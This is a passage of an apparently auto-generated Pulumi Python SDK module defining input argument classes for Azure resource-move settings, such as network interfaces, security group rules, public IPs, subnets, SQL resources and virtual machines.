def target_resource_name(self) -> pulumi.Input[str]:
"""
Gets or sets the target Resource name.
"""
return pulumi.get(self, "target_resource_name")
@target_resource_name.setter
def target_resource_name(self, value: pulumi.Input[str]):
pulumi.set(self, "target_resource_name", value)
@property
@pulumi.getter(name="enableAcceleratedNetworking")
def enable_accelerated_networking(self) -> Optional[pulumi.Input[bool]]:
"""
Gets or sets a value indicating whether accelerated networking is enabled.
"""
return pulumi.get(self, "enable_accelerated_networking")
@enable_accelerated_networking.setter
def enable_accelerated_networking(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enable_accelerated_networking", value)
@property
@pulumi.getter(name="ipConfigurations")
def ip_configurations(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['NicIpConfigurationResourceSettingsArgs']]]]:
"""
Gets or sets the IP configurations of the NIC.
"""
return pulumi.get(self, "ip_configurations")
@ip_configurations.setter
def ip_configurations(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['NicIpConfigurationResourceSettingsArgs']]]]):
pulumi.set(self, "ip_configurations", value)
@pulumi.input_type
class NetworkSecurityGroupResourceSettingsArgs:
def __init__(__self__, *,
resource_type: pulumi.Input[str],
target_resource_name: pulumi.Input[str],
security_rules: Optional[pulumi.Input[Sequence[pulumi.Input['NsgSecurityRuleArgs']]]] = None):
"""
Defines the NSG resource settings.
:param pulumi.Input[str] resource_type: The resource type. For example, the value can be Microsoft.Compute/virtualMachines.
Expected value is 'Microsoft.Network/networkSecurityGroups'.
:param pulumi.Input[str] target_resource_name: Gets or sets the target Resource name.
:param pulumi.Input[Sequence[pulumi.Input['NsgSecurityRuleArgs']]] security_rules: Gets or sets Security rules of network security group.
"""
pulumi.set(__self__, "resource_type", 'Microsoft.Network/networkSecurityGroups')
pulumi.set(__self__, "target_resource_name", target_resource_name)
if security_rules is not None:
pulumi.set(__self__, "security_rules", security_rules)
@property
@pulumi.getter(name="resourceType")
def resource_type(self) -> pulumi.Input[str]:
"""
The resource type. For example, the value can be Microsoft.Compute/virtualMachines.
Expected value is 'Microsoft.Network/networkSecurityGroups'.
"""
return pulumi.get(self, "resource_type")
@resource_type.setter
def resource_type(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_type", value)
@property
@pulumi.getter(name="targetResourceName")
def target_resource_name(self) -> pulumi.Input[str]:
"""
Gets or sets the target Resource name.
"""
return pulumi.get(self, "target_resource_name")
@target_resource_name.setter
def target_resource_name(self, value: pulumi.Input[str]):
pulumi.set(self, "target_resource_name", value)
@property
@pulumi.getter(name="securityRules")
def security_rules(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['NsgSecurityRuleArgs']]]]:
"""
Gets or sets Security rules of network security group.
"""
return pulumi.get(self, "security_rules")
@security_rules.setter
def security_rules(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['NsgSecurityRuleArgs']]]]):
pulumi.set(self, "security_rules", value)
@pulumi.input_type
class NicIpConfigurationResourceSettingsArgs:
def __init__(__self__, *,
load_balancer_backend_address_pools: Optional[pulumi.Input[Sequence[pulumi.Input['LoadBalancerBackendAddressPoolReferenceArgs']]]] = None,
load_balancer_nat_rules: Optional[pulumi.Input[Sequence[pulumi.Input['LoadBalancerNatRuleReferenceArgs']]]] = None,
name: Optional[pulumi.Input[str]] = None,
primary: Optional[pulumi.Input[bool]] = None,
private_ip_address: Optional[pulumi.Input[str]] = None,
private_ip_allocation_method: Optional[pulumi.Input[str]] = None,
public_ip: Optional[pulumi.Input['PublicIpReferenceArgs']] = None,
subnet: Optional[pulumi.Input['SubnetReferenceArgs']] = None):
"""
Defines NIC IP configuration properties.
:param pulumi.Input[Sequence[pulumi.Input['LoadBalancerBackendAddressPoolReferenceArgs']]] load_balancer_backend_address_pools: Gets or sets the references of the load balancer backend address pools.
:param pulumi.Input[Sequence[pulumi.Input['LoadBalancerNatRuleReferenceArgs']]] load_balancer_nat_rules: Gets or sets the references of the load balancer NAT rules.
:param pulumi.Input[str] name: Gets or sets the IP configuration name.
:param pulumi.Input[bool] primary: Gets or sets a value indicating whether this IP configuration is the primary.
:param pulumi.Input[str] private_ip_address: Gets or sets the private IP address of the network interface IP Configuration.
:param pulumi.Input[str] private_ip_allocation_method: Gets or sets the private IP address allocation method.
:param pulumi.Input['PublicIpReferenceArgs'] public_ip: Defines reference to a public IP.
:param pulumi.Input['SubnetReferenceArgs'] subnet: Defines reference to subnet.
"""
if load_balancer_backend_address_pools is not None:
pulumi.set(__self__, "load_balancer_backend_address_pools", load_balancer_backend_address_pools)
if load_balancer_nat_rules is not None:
pulumi.set(__self__, "load_balancer_nat_rules", load_balancer_nat_rules)
if name is not None:
pulumi.set(__self__, "name", name)
if primary is not None:
pulumi.set(__self__, "primary", primary)
if private_ip_address is not None:
pulumi.set(__self__, "private_ip_address", private_ip_address)
if private_ip_allocation_method is not None:
pulumi.set(__self__, "private_ip_allocation_method", private_ip_allocation_method)
if public_ip is not None:
pulumi.set(__self__, "public_ip", public_ip)
if subnet is not None:
pulumi.set(__self__, "subnet", subnet)
@property
@pulumi.getter(name="loadBalancerBackendAddressPools")
def load_balancer_backend_address_pools(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['LoadBalancerBackendAddressPoolReferenceArgs']]]]:
"""
Gets or sets the references of the load balancer backend address pools.
"""
return pulumi.get(self, "load_balancer_backend_address_pools")
@load_balancer_backend_address_pools.setter
def load_balancer_backend_address_pools(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['LoadBalancerBackendAddressPoolReferenceArgs']]]]):
pulumi.set(self, "load_balancer_backend_address_pools", value)
@property
@pulumi.getter(name="loadBalancerNatRules")
def load_balancer_nat_rules(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['LoadBalancerNatRuleReferenceArgs']]]]:
"""
Gets or sets the references of the load balancer NAT rules.
"""
return pulumi.get(self, "load_balancer_nat_rules")
@load_balancer_nat_rules.setter
def load_balancer_nat_rules(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['LoadBalancerNatRuleReferenceArgs']]]]):
pulumi.set(self, "load_balancer_nat_rules", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Gets or sets the IP configuration name.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def primary(self) -> Optional[pulumi.Input[bool]]:
"""
Gets or sets a value indicating whether this IP configuration is the primary.
"""
return pulumi.get(self, "primary")
@primary.setter
def primary(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "primary", value)
@property
@pulumi.getter(name="privateIpAddress")
def private_ip_address(self) -> Optional[pulumi.Input[str]]:
"""
Gets or sets the private IP address of the network interface IP Configuration.
"""
return pulumi.get(self, "private_ip_address")
@private_ip_address.setter
def private_ip_address(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "private_ip_address", value)
@property
@pulumi.getter(name="privateIpAllocationMethod")
def private_ip_allocation_method(self) -> Optional[pulumi.Input[str]]:
"""
Gets or sets the private IP address allocation method.
"""
return pulumi.get(self, "private_ip_allocation_method")
@private_ip_allocation_method.setter
def private_ip_allocation_method(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "private_ip_allocation_method", value)
@property
@pulumi.getter(name="publicIp")
def public_ip(self) -> Optional[pulumi.Input['PublicIpReferenceArgs']]:
"""
Defines reference to a public IP.
"""
return pulumi.get(self, "public_ip")
@public_ip.setter
def public_ip(self, value: Optional[pulumi.Input['PublicIpReferenceArgs']]):
pulumi.set(self, "public_ip", value)
@property
@pulumi.getter
def subnet(self) -> Optional[pulumi.Input['SubnetReferenceArgs']]:
"""
Defines reference to subnet.
"""
return pulumi.get(self, "subnet")
@subnet.setter
def subnet(self, value: Optional[pulumi.Input['SubnetReferenceArgs']]):
pulumi.set(self, "subnet", value)
@pulumi.input_type
class NsgReferenceArgs:
def __init__(__self__, *,
source_arm_resource_id: pulumi.Input[str]):
"""
Defines reference to NSG.
:param pulumi.Input[str] source_arm_resource_id: Gets the ARM resource ID of the tracked resource being referenced.
"""
pulumi.set(__self__, "source_arm_resource_id", source_arm_resource_id)
@property
@pulumi.getter(name="sourceArmResourceId")
def source_arm_resource_id(self) -> pulumi.Input[str]:
"""
Gets the ARM resource ID of the tracked resource being referenced.
"""
return pulumi.get(self, "source_arm_resource_id")
@source_arm_resource_id.setter
def source_arm_resource_id(self, value: pulumi.Input[str]):
pulumi.set(self, "source_arm_resource_id", value)
@pulumi.input_type
class NsgSecurityRuleArgs:
def __init__(__self__, *,
access: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
destination_address_prefix: Optional[pulumi.Input[str]] = None,
destination_port_range: Optional[pulumi.Input[str]] = None,
direction: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
priority: Optional[pulumi.Input[int]] = None,
protocol: Optional[pulumi.Input[str]] = None,
source_address_prefix: Optional[pulumi.Input[str]] = None,
source_port_range: Optional[pulumi.Input[str]] = None):
"""
Security Rule data model for Network Security Groups.
:param pulumi.Input[str] access: Gets or sets whether network traffic is allowed or denied.
Possible values are “Allow” and “Deny”.
:param pulumi.Input[str] description: Gets or sets a description for this rule. Restricted to 140 chars.
:param pulumi.Input[str] destination_address_prefix: Gets or sets destination address prefix. CIDR or source IP range.
A “*” can also be used to match all source IPs. Default tags such
as ‘VirtualNetwork’, ‘AzureLoadBalancer’ and ‘Internet’ can also be used.
:param pulumi.Input[str] destination_port_range: Gets or sets Destination Port or Range. Integer or range between
0 and 65535. A “*” can also be used to match all ports.
:param pulumi.Input[str] direction: Gets or sets the direction of the rule.InBound or Outbound. The
direction specifies if rule will be evaluated on incoming or outgoing traffic.
:param pulumi.Input[str] name: Gets or sets the Security rule name.
:param pulumi.Input[int] priority: Gets or sets the priority of the rule. The value can be between
100 and 4096. The priority number must be unique for each rule in the collection.
The lower the priority number, the higher the priority of the rule.
:param pulumi.Input[str] protocol: Gets or sets Network protocol this rule applies to. Can be Tcp, Udp or All(*).
:param pulumi.Input[str] source_address_prefix: Gets or sets source address prefix. CIDR or source IP range. A
“*” can also be used to match all source IPs. Default tags such as ‘VirtualNetwork’,
‘AzureLoadBalancer’ and ‘Internet’ can also be used. If this is an ingress
rule, specifies where network traffic originates from.
:param pulumi.Input[str] source_port_range: Gets or sets Source Port or Range. Integer or range between 0 and
65535. A “*” can also be used to match all ports.
"""
if access is not None:
pulumi.set(__self__, "access", access)
if description is not None:
pulumi.set(__self__, "description", description)
if destination_address_prefix is not None:
pulumi.set(__self__, "destination_address_prefix", destination_address_prefix)
if destination_port_range is not None:
pulumi.set(__self__, "destination_port_range", destination_port_range)
if direction is not None:
pulumi.set(__self__, "direction", direction)
if name is not None:
pulumi.set(__self__, "name", name)
if priority is not None:
pulumi.set(__self__, "priority", priority)
if protocol is not None:
pulumi.set(__self__, "protocol", protocol)
if source_address_prefix is not None:
pulumi.set(__self__, "source_address_prefix", source_address_prefix)
if source_port_range is not None:
pulumi.set(__self__, "source_port_range", source_port_range)
@property
@pulumi.getter
def access(self) -> Optional[pulumi.Input[str]]:
"""
Gets or sets whether network traffic is allowed or denied.
Possible values are “Allow” and “Deny”.
"""
return pulumi.get(self, "access")
@access.setter
def access(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "access", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Gets or sets a description for this rule. Restricted to 140 chars.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="destinationAddressPrefix")
def destination_address_prefix(self) -> Optional[pulumi.Input[str]]:
"""
Gets or sets destination address prefix. CIDR or source IP range.
A “*” can also be used to match all source IPs. Default tags such
as ‘VirtualNetwork’, ‘AzureLoadBalancer’ and ‘Internet’ can also be used.
"""
return pulumi.get(self, "destination_address_prefix")
@destination_address_prefix.setter
def destination_address_prefix(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "destination_address_prefix", value)
@property
@pulumi.getter(name="destinationPortRange")
def destination_port_range(self) -> Optional[pulumi.Input[str]]:
"""
Gets or sets Destination Port or Range. Integer or range between
0 and 65535. A “*” can also be used to match all ports.
"""
return pulumi.get(self, "destination_port_range")
@destination_port_range.setter
def destination_port_range(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "destination_port_range", value)
@property
@pulumi.getter
def direction(self) -> Optional[pulumi.Input[str]]:
"""
Gets or sets the direction of the rule.InBound or Outbound. The
direction specifies if rule will be evaluated on incoming or outgoing traffic.
"""
return pulumi.get(self, "direction")
@direction.setter
def direction(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "direction", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Gets or sets the Security rule name.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def priority(self) -> Optional[pulumi.Input[int]]:
"""
Gets or sets the priority of the rule. The value can be between
100 and 4096. The priority number must be unique for each rule in the collection.
The lower the priority number, the higher the priority of the rule.
"""
return pulumi.get(self, "priority")
@priority.setter
def priority(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "priority", value)
@property
@pulumi.getter
def protocol(self) -> Optional[pulumi.Input[str]]:
"""
Gets or sets Network protocol this rule applies to. Can be Tcp, Udp or All(*).
"""
return pulumi.get(self, "protocol")
@protocol.setter
def protocol(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "protocol", value)
@property
@pulumi.getter(name="sourceAddressPrefix")
def source_address_prefix(self) -> Optional[pulumi.Input[str]]:
"""
Gets or sets source address prefix. CIDR or source IP range. A
“*” can also be used to match all source IPs. Default tags such as ‘VirtualNetwork’,
‘AzureLoadBalancer’ and ‘Internet’ can also be used. If this is an ingress
rule, specifies where network traffic originates from.
"""
return pulumi.get(self, "source_address_prefix")
@source_address_prefix.setter
def source_address_prefix(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "source_address_prefix", value)
@property
@pulumi.getter(name="sourcePortRange")
def source_port_range(self) -> Optional[pulumi.Input[str]]:
"""
Gets or sets Source Port or Range. Integer or range between 0 and
65535. A “*” can also be used to match all ports.
"""
return pulumi.get(self, "source_port_range")
@source_port_range.setter
def source_port_range(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "source_port_range", value)
@pulumi.input_type
class PublicIPAddressResourceSettingsArgs:
def __init__(__self__, *,
resource_type: pulumi.Input[str],
target_resource_name: pulumi.Input[str],
domain_name_label: Optional[pulumi.Input[str]] = None,
fqdn: Optional[pulumi.Input[str]] = None,
public_ip_allocation_method: Optional[pulumi.Input[str]] = None,
sku: Optional[pulumi.Input[str]] = None,
zones: Optional[pulumi.Input[str]] = None):
"""
Defines the public IP address resource settings.
:param pulumi.Input[str] resource_type: The resource type. For example, the value can be Microsoft.Compute/virtualMachines.
Expected value is 'Microsoft.Network/publicIPAddresses'.
:param pulumi.Input[str] target_resource_name: Gets or sets the target Resource name.
:param pulumi.Input[str] domain_name_label: Gets or sets the domain name label.
:param pulumi.Input[str] fqdn: Gets or sets the fully qualified domain name.
:param pulumi.Input[str] public_ip_allocation_method: Gets or sets public IP allocation method.
:param pulumi.Input[str] sku: Gets or sets public IP sku.
:param pulumi.Input[str] zones: Gets or sets public IP zones.
"""
pulumi.set(__self__, "resource_type", 'Microsoft.Network/publicIPAddresses')
pulumi.set(__self__, "target_resource_name", target_resource_name)
if domain_name_label is not None:
pulumi.set(__self__, "domain_name_label", domain_name_label)
if fqdn is not None:
pulumi.set(__self__, "fqdn", fqdn)
if public_ip_allocation_method is not None:
pulumi.set(__self__, "public_ip_allocation_method", public_ip_allocation_method)
if sku is not None:
pulumi.set(__self__, "sku", sku)
if zones is not None:
pulumi.set(__self__, "zones", zones)
@property
@pulumi.getter(name="resourceType")
def resource_type(self) -> pulumi.Input[str]:
"""
The resource type. For example, the value can be Microsoft.Compute/virtualMachines.
Expected value is 'Microsoft.Network/publicIPAddresses'.
"""
return pulumi.get(self, "resource_type")
@resource_type.setter
def resource_type(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_type", value)
@property
@pulumi.getter(name="targetResourceName")
def target_resource_name(self) -> pulumi.Input[str]:
"""
Gets or sets the target Resource name.
"""
return pulumi.get(self, "target_resource_name")
@target_resource_name.setter
def target_resource_name(self, value: pulumi.Input[str]):
pulumi.set(self, "target_resource_name", value)
@property
@pulumi.getter(name="domainNameLabel")
def domain_name_label(self) -> Optional[pulumi.Input[str]]:
"""
Gets or sets the domain name label.
"""
return pulumi.get(self, "domain_name_label")
@domain_name_label.setter
def domain_name_label(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "domain_name_label", value)
@property
@pulumi.getter
def fqdn(self) -> Optional[pulumi.Input[str]]:
"""
Gets or sets the fully qualified domain name.
"""
return pulumi.get(self, "fqdn")
@fqdn.setter
def fqdn(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "fqdn", value)
@property
@pulumi.getter(name="publicIpAllocationMethod")
def public_ip_allocation_method(self) -> Optional[pulumi.Input[str]]:
"""
Gets or sets public IP allocation method.
"""
return pulumi.get(self, "public_ip_allocation_method")
@public_ip_allocation_method.setter
def public_ip_allocation_method(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "public_ip_allocation_method", value)
@property
@pulumi.getter
def sku(self) -> Optional[pulumi.Input[str]]:
"""
Gets or sets public IP sku.
"""
return pulumi.get(self, "sku")
@sku.setter
def sku(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "sku", value)
@property
@pulumi.getter
def zones(self) -> Optional[pulumi.Input[str]]:
"""
Gets or sets public IP zones.
"""
return pulumi.get(self, "zones")
@zones.setter
def zones(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "zones", value)
@pulumi.input_type
class PublicIpReferenceArgs:
def __init__(__self__, *,
source_arm_resource_id: pulumi.Input[str]):
"""
Defines reference to a public IP.
:param pulumi.Input[str] source_arm_resource_id: Gets the ARM resource ID of the tracked resource being referenced.
"""
pulumi.set(__self__, "source_arm_resource_id", source_arm_resource_id)
@property
@pulumi.getter(name="sourceArmResourceId")
def source_arm_resource_id(self) -> pulumi.Input[str]:
"""
Gets the ARM resource ID of the tracked resource being referenced.
"""
return pulumi.get(self, "source_arm_resource_id")
@source_arm_resource_id.setter
def source_arm_resource_id(self, value: pulumi.Input[str]):
pulumi.set(self, "source_arm_resource_id", value)
@pulumi.input_type
class ResourceGroupResourceSettingsArgs:
def __init__(__self__, *,
resource_type: pulumi.Input[str],
target_resource_name: pulumi.Input[str]):
"""
Defines the resource group resource settings.
:param pulumi.Input[str] resource_type: The resource type. For example, the value can be Microsoft.Compute/virtualMachines.
Expected value is 'resourceGroups'.
:param pulumi.Input[str] target_resource_name: Gets or sets the target Resource name.
"""
pulumi.set(__self__, "resource_type", 'resourceGroups')
pulumi.set(__self__, "target_resource_name", target_resource_name)
@property
@pulumi.getter(name="resourceType")
def resource_type(self) -> pulumi.Input[str]:
"""
The resource type. For example, the value can be Microsoft.Compute/virtualMachines.
Expected value is 'resourceGroups'.
"""
return pulumi.get(self, "resource_type")
@resource_type.setter
def resource_type(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_type", value)
@property
@pulumi.getter(name="targetResourceName")
def target_resource_name(self) -> pulumi.Input[str]:
"""
Gets or sets the target Resource name.
"""
return pulumi.get(self, "target_resource_name")
@target_resource_name.setter
def target_resource_name(self, value: pulumi.Input[str]):
pulumi.set(self, "target_resource_name", value)
@pulumi.input_type
class SqlDatabaseResourceSettingsArgs:
def __init__(__self__, *,
resource_type: pulumi.Input[str],
target_resource_name: pulumi.Input[str],
zone_redundant: Optional[pulumi.Input[Union[str, 'ZoneRedundant']]] = None):
"""
Defines the Sql Database resource settings.
:param pulumi.Input[str] resource_type: The resource type. For example, the value can be Microsoft.Compute/virtualMachines.
Expected value is 'Microsoft.Sql/servers/databases'.
:param pulumi.Input[str] target_resource_name: Gets or sets the target Resource name.
:param pulumi.Input[Union[str, 'ZoneRedundant']] zone_redundant: Defines the zone redundant resource setting.
"""
pulumi.set(__self__, "resource_type", 'Microsoft.Sql/servers/databases')
pulumi.set(__self__, "target_resource_name", target_resource_name)
if zone_redundant is not None:
pulumi.set(__self__, "zone_redundant", zone_redundant)
@property
@pulumi.getter(name="resourceType")
def resource_type(self) -> pulumi.Input[str]:
"""
The resource type. For example, the value can be Microsoft.Compute/virtualMachines.
Expected value is 'Microsoft.Sql/servers/databases'.
"""
return pulumi.get(self, "resource_type")
@resource_type.setter
def resource_type(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_type", value)
@property
@pulumi.getter(name="targetResourceName")
def target_resource_name(self) -> pulumi.Input[str]:
"""
Gets or sets the target Resource name.
"""
return pulumi.get(self, "target_resource_name")
@target_resource_name.setter
def target_resource_name(self, value: pulumi.Input[str]):
pulumi.set(self, "target_resource_name", value)
@property
@pulumi.getter(name="zoneRedundant")
def zone_redundant(self) -> Optional[pulumi.Input[Union[str, 'ZoneRedundant']]]:
"""
Defines the zone redundant resource setting.
"""
return pulumi.get(self, "zone_redundant")
@zone_redundant.setter
def zone_redundant(self, value: Optional[pulumi.Input[Union[str, 'ZoneRedundant']]]):
pulumi.set(self, "zone_redundant", value)
@pulumi.input_type
class SqlElasticPoolResourceSettingsArgs:
def __init__(__self__, *,
resource_type: pulumi.Input[str],
target_resource_name: pulumi.Input[str],
zone_redundant: Optional[pulumi.Input[Union[str, 'ZoneRedundant']]] = None):
"""
Defines the Sql ElasticPool resource settings.
:param pulumi.Input[str] resource_type: The resource type. For example, the value can be Microsoft.Compute/virtualMachines.
Expected value is 'Microsoft.Sql/servers/elasticPools'.
:param pulumi.Input[str] target_resource_name: Gets or sets the target Resource name.
:param pulumi.Input[Union[str, 'ZoneRedundant']] zone_redundant: Defines the zone redundant resource setting.
"""
pulumi.set(__self__, "resource_type", 'Microsoft.Sql/servers/elasticPools')
pulumi.set(__self__, "target_resource_name", target_resource_name)
if zone_redundant is not None:
pulumi.set(__self__, "zone_redundant", zone_redundant)
@property
@pulumi.getter(name="resourceType")
def resource_type(self) -> pulumi.Input[str]:
"""
The resource type. For example, the value can be Microsoft.Compute/virtualMachines.
Expected value is 'Microsoft.Sql/servers/elasticPools'.
"""
return pulumi.get(self, "resource_type")
@resource_type.setter
def resource_type(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_type", value)
@property
@pulumi.getter(name="targetResourceName")
def target_resource_name(self) -> pulumi.Input[str]:
"""
Gets or sets the target Resource name.
"""
return pulumi.get(self, "target_resource_name")
@target_resource_name.setter
def target_resource_name(self, value: pulumi.Input[str]):
pulumi.set(self, "target_resource_name", value)
@property
@pulumi.getter(name="zoneRedundant")
def zone_redundant(self) -> Optional[pulumi.Input[Union[str, 'ZoneRedundant']]]:
"""
Defines the zone redundant resource setting.
"""
return pulumi.get(self, "zone_redundant")
@zone_redundant.setter
def zone_redundant(self, value: Optional[pulumi.Input[Union[str, 'ZoneRedundant']]]):
pulumi.set(self, "zone_redundant", value)
@pulumi.input_type
class SqlServerResourceSettingsArgs:
def __init__(__self__, *,
resource_type: pulumi.Input[str],
target_resource_name: pulumi.Input[str]):
"""
Defines the SQL Server resource settings.
:param pulumi.Input[str] resource_type: The resource type. For example, the value can be Microsoft.Compute/virtualMachines.
Expected value is 'Microsoft.Sql/servers'.
:param pulumi.Input[str] target_resource_name: Gets or sets the target Resource name.
"""
pulumi.set(__self__, "resource_type", 'Microsoft.Sql/servers')
pulumi.set(__self__, "target_resource_name", target_resource_name)
@property
@pulumi.getter(name="resourceType")
def resource_type(self) -> pulumi.Input[str]:
"""
The resource type. For example, the value can be Microsoft.Compute/virtualMachines.
Expected value is 'Microsoft.Sql/servers'.
"""
return pulumi.get(self, "resource_type")
@resource_type.setter
def resource_type(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_type", value)
@property
@pulumi.getter(name="targetResourceName")
def target_resource_name(self) -> pulumi.Input[str]:
"""
Gets or sets the target Resource name.
"""
return pulumi.get(self, "target_resource_name")
@target_resource_name.setter
def target_resource_name(self, value: pulumi.Input[str]):
pulumi.set(self, "target_resource_name", value)
@pulumi.input_type
class SubnetReferenceArgs:
def __init__(__self__, *,
source_arm_resource_id: pulumi.Input[str],
name: Optional[pulumi.Input[str]] = None):
"""
Defines reference to subnet.
:param pulumi.Input[str] source_arm_resource_id: Gets the ARM resource ID of the tracked resource being referenced.
:param pulumi.Input[str] name: Gets the name of the proxy resource on the target side.
"""
pulumi.set(__self__, "source_arm_resource_id", source_arm_resource_id)
if name is not None:
pulumi.set(__self__, "name", name)
@property
@pulumi.getter(name="sourceArmResourceId")
def source_arm_resource_id(self) -> pulumi.Input[str]:
"""
Gets the ARM resource ID of the tracked resource being referenced.
"""
return pulumi.get(self, "source_arm_resource_id")
@source_arm_resource_id.setter
def source_arm_resource_id(self, value: pulumi.Input[str]):
pulumi.set(self, "source_arm_resource_id", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Gets the name of the proxy resource on the target side.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@pulumi.input_type
class SubnetResourceSettingsArgs:
def __init__(__self__, *,
address_prefix: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
network_security_group: Optional[pulumi.Input['NsgReferenceArgs']] = None):
"""
Defines the virtual network subnets resource settings.
:param pulumi.Input[str] address_prefix: Gets or sets address prefix for the subnet.
:param pulumi.Input[str] name: Gets or sets the Subnet name.
:param pulumi.Input['NsgReferenceArgs'] network_security_group: Defines reference to NSG.
"""
if address_prefix is not None:
pulumi.set(__self__, "address_prefix", address_prefix)
if name is not None:
pulumi.set(__self__, "name", name)
if network_security_group is not None:
pulumi.set(__self__, "network_security_group", network_security_group)
@property
@pulumi.getter(name="addressPrefix")
def address_prefix(self) -> Optional[pulumi.Input[str]]:
"""
Gets or sets address prefix for the subnet.
"""
return pulumi.get(self, "address_prefix")
@address_prefix.setter
def address_prefix(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "address_prefix", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Gets or sets the Subnet name.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="networkSecurityGroup")
def network_security_group(self) -> Optional[pulumi.Input['NsgReferenceArgs']]:
"""
Defines reference to NSG.
"""
return pulumi.get(self, "network_security_group")
@network_security_group.setter
def network_security_group(self, value: Optional[pulumi.Input['NsgReferenceArgs']]):
pulumi.set(self, "network_security_group", value)
@pulumi.input_type
class VirtualMachineResourceSettingsArgs:
def __init__(__self__, *,
resource_type: pulumi.Input[str],
target_resource_name: pulumi.Input[str],
target_availability_set_id: Optional[pulumi.Input[str]] = None,
target_availability_zone: Optional[pulumi.Input[Union[str, 'TargetAvailabilityZone']]] = None,
target_vm_size: Optional[pulumi.Input[str]] = None):
"""
Gets or sets the virtual machine resource settings.
:param pulumi.Input[str] resource_type: The resource type. For example, the value can be Microsoft.Compute/virtualMachines.
Expected value is 'Microsoft.Compute/virtualMachines'.
:param pulumi.Input[str] target_resource_name: Gets or sets the target Resource name.
:param pulumi.Input[str] target_availability_set_id: Gets or sets the target availability set id for virtual machines not in an availability set at source.
:param pulumi.Input[Union[str, 'TargetAvailabilityZone']] target_availability_zone: Gets or sets the target availability zone.
:param pulumi.Input[str] target_vm_size: Gets or sets the target virtual machine size.
"""
pulumi.set(__self__, "resource_type", 'Microsoft.Compute/virtualMachines')
pulumi.set(__self__, "target_resource_name", target_resource_name)
if target_availability_set_id is not None:
pulumi.set(__self__, "target_availability_set_id", target_availability_set_id)
if target_availability_zone is not None:
pulumi.set(__self__, "target_availability_zone", target_availability_zone)
if target_vm_size is not None:
pulumi.set(__self__, "target_vm_size", target_vm_size)
@property
@pulumi.getter(name="resourceType")
def resource_type(self) -> pulumi.Input[str]:
"""
The resource type. For example, the value can be Microsoft.Compute/virtualMachines.
Expected value is 'Microsoft.Compute/virtualMachines'.
"""
return pulumi.get(self, "resource_type")
@resource_type.setter
def resource_type(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_type", value)
@property
@pulumi.getter(name="targetResourceName")
def target_resource_name(self) -> pulumi.Input[str]:
"""
Gets or sets the target Resource name.
"""
return pulumi.get(self, "target_resource_name")
@target_resource_name.setter
def target_resource_name(self, value: pulumi.Input[str]):
pulumi.set(self, "target_resource_name", value)
@property
@pulumi.getter(name="targetAvailabilitySetId")
def target_availability_set_id(self) -> Optional[pulumi.Input[str]]:
"""
Gets or sets the target availability set id for virtual machines not in an availability set at source.
"""
return pulumi.get(self, "target_availability_set_id")
@target_availability_set_id.setter
def target_availability_set_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "target_availability_set_id", value)
@property
@pulumi.getter(name="targetAvailabilityZone")
def target_availability_zone(self) -> Optional[pulumi.Input[Union[str, 'TargetAvailabilityZone']]]:
"""
Gets or sets the target availability zone.
"""
return pulumi.get(self, "target_availability_zone")
@target_availability_zone.setter
def target_availability_zone(self, value: Optional[pulumi.Input[Union[str, 'TargetAvailabilityZone']]]):
pulumi.set(self, "target_availability_zone", value)
@property
@pulumi.getter(name="targetVmSize")
def target_vm_size(self) -> Optional[pulumi.Input[str]]:
"""
Gets or sets the target virtual machine size.
"""
return pulumi.get(self, "target_vm_size")
@target_vm_size.setter
def target_vm_size(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "target_vm_size", value)
@pulumi.input_type
